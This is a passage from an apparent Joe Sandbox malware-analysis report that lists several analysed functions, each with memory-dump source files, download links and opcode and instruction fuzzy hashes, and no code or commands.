                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 06648485bf9bdd039b12a1aa143bddee105e8025cf292422582774f7db6ad4ab
                                                                                                      • Instruction ID: ba8369186a672e46259504223ec3032955dd050979623b91dc328ad52210d1c3
                                                                                                      • Opcode Fuzzy Hash: 06648485bf9bdd039b12a1aa143bddee105e8025cf292422582774f7db6ad4ab
                                                                                                      • Instruction Fuzzy Hash: 7DB1F671E092A88AF7208625DC447DABBB5EF91304F0440FAD44D67282DA7E5FC5CFA6
                                                                                                      Function 004124EA Relevance: 30.2, Strings: 24, Instructions: 245COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 94fcdfa14d9d30dc4543134e168e31207c0f7ec68e6ec134732b57131498331e
                                                                                                      • Instruction ID: df84cfcc2485e6462008dcbd3bfb23303e33ed1f330b0fa684f76298899b1430
                                                                                                      • Opcode Fuzzy Hash: 94fcdfa14d9d30dc4543134e168e31207c0f7ec68e6ec134732b57131498331e
                                                                                                      • Instruction Fuzzy Hash: 35B1C471D092A88AFB218B24DC447DABBB1AF51304F1480FAC44D57282DB7A5FC5CFA6
                                                                                                      Function 0040B33B Relevance: 30.2, Strings: 24, Instructions: 244COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 2d2fc636c1e4f6c674ac22b5e21d9132c11a0605b5a1d5f359536b517086c8fb
                                                                                                      • Instruction ID: 178f1f81d928b8ee5792c141dfc30e23cf258479c5e375cbf08cd49bba61b6de
                                                                                                      • Opcode Fuzzy Hash: 2d2fc636c1e4f6c674ac22b5e21d9132c11a0605b5a1d5f359536b517086c8fb
                                                                                                      • Instruction Fuzzy Hash: 5CA1B471D092A88AFB248B15CC447EABBB1EF51304F1480FAC44D67282DB7D5FC58BA6
                                                                                                      Function 0040B404 Relevance: 30.2, Strings: 24, Instructions: 243COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 26e7db153662676a7c180f2c7609961f9f2f166471f08989f75796f3a68f30e5
                                                                                                      • Instruction ID: 15ddaeb9dd943c70b11a963fbbce2b526b00a009a0ebcefb578196d7b3786b4b
                                                                                                      • Opcode Fuzzy Hash: 26e7db153662676a7c180f2c7609961f9f2f166471f08989f75796f3a68f30e5
                                                                                                      • Instruction Fuzzy Hash: 47A1C371D092A88AFB248B24CC447DABBB1EF51304F1480FAC44D67282DB7D4FC58BA6
                                                                                                      Function 0041445F Relevance: 30.2, Strings: 24, Instructions: 242COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: d7785d781b1fef8f0cd9249f896dc0d99dcbbb018a5f323a56ad1045edf6eadd
                                                                                                      • Instruction ID: c169f882071b50a71fe1db379f41b3559e41a0b82dfd6c85ac185bab63c6c669
                                                                                                      • Opcode Fuzzy Hash: d7785d781b1fef8f0cd9249f896dc0d99dcbbb018a5f323a56ad1045edf6eadd
                                                                                                      • Instruction Fuzzy Hash: 3BA1C271D092A88AFB248B14DC447DABBB1EF51304F1480FAC44D67281DA7A5FC5CFA6
                                                                                                      Function 00414747 Relevance: 30.2, Strings: 24, Instructions: 242COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 31d017ad0a1a2c9a4ebaf4630bbcbc4df4f3a387eca0491f268d108add80a258
                                                                                                      • Instruction ID: e5fc5e3e72d67c5aeae056b6df21200024883376d785249ba13af249f31e706f
                                                                                                      • Opcode Fuzzy Hash: 31d017ad0a1a2c9a4ebaf4630bbcbc4df4f3a387eca0491f268d108add80a258
                                                                                                      • Instruction Fuzzy Hash: 08B1B171D092A88AFB208A24DC447DABBB1EF55304F1480FAD44D67281DA7A5FC5CF96
                                                                                                      Function 00418002 Relevance: 30.2, Strings: 24, Instructions: 241COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 98412f8f8fde63d01184db8a8e622e29e688a106a14692115c99a021f08ff947
                                                                                                      • Instruction ID: 4094a0ae615c01c292cca29148059d1f7c850554f3414874e1249b3cccb469c2
                                                                                                      • Opcode Fuzzy Hash: 98412f8f8fde63d01184db8a8e622e29e688a106a14692115c99a021f08ff947
                                                                                                      • Instruction Fuzzy Hash: 7CA1D271D096A88AFB248A24CC447DABBB1EF55304F1480F9C44D67282DB7A5FC5CF96
                                                                                                      Function 0041221F Relevance: 30.2, Strings: 24, Instructions: 241COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 454b90763410ddcaa1a56de77956ba79326abd12119543eebbaa4876afa8fef2
                                                                                                      • Instruction ID: a943972350c0246b4bbc2c783a6d0bffc6b1904eb5b02cc0cbddf8b4b15582a4
                                                                                                      • Opcode Fuzzy Hash: 454b90763410ddcaa1a56de77956ba79326abd12119543eebbaa4876afa8fef2
                                                                                                      • Instruction Fuzzy Hash: 02A1B371D092A88AFB248624DC447DABBB1AF51304F1480F9D44D67282DB7A5FC5CFA6
                                                                                                      Function 00414464 Relevance: 30.2, Strings: 24, Instructions: 241COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 18dcf711415e72169d91da6dabdc20b076cb4480245985d6c52b98ae1d257a54
                                                                                                      • Instruction ID: 4d185ff1bb9af00d11b256a2cb6d53f75aa58327a075af00dc884db04267ef29
                                                                                                      • Opcode Fuzzy Hash: 18dcf711415e72169d91da6dabdc20b076cb4480245985d6c52b98ae1d257a54
                                                                                                      • Instruction Fuzzy Hash: C4A1C371D096A88AF7248B24CC447DABBB1EF51304F1480FAC44D67282DA7A5FC5CF96
                                                                                                      Function 00418094 Relevance: 30.2, Strings: 24, Instructions: 240COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 9250b2fb4c02aa75645d91fa2292f6564ecfcdc98e215bcf04475857f2a66981
                                                                                                      • Instruction ID: 502b6f47efb9540e2f1ceb7c45c33639041457bff02d00115750c684ff5cd50c
                                                                                                      • Opcode Fuzzy Hash: 9250b2fb4c02aa75645d91fa2292f6564ecfcdc98e215bcf04475857f2a66981
                                                                                                      • Instruction Fuzzy Hash: ACA1D271D096A88AFB248614DC447DABBB1EF51304F1480FAC48C67282DA7E5FC5CFA6
                                                                                                      Function 00413137 Relevance: 30.2, Strings: 24, Instructions: 240COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
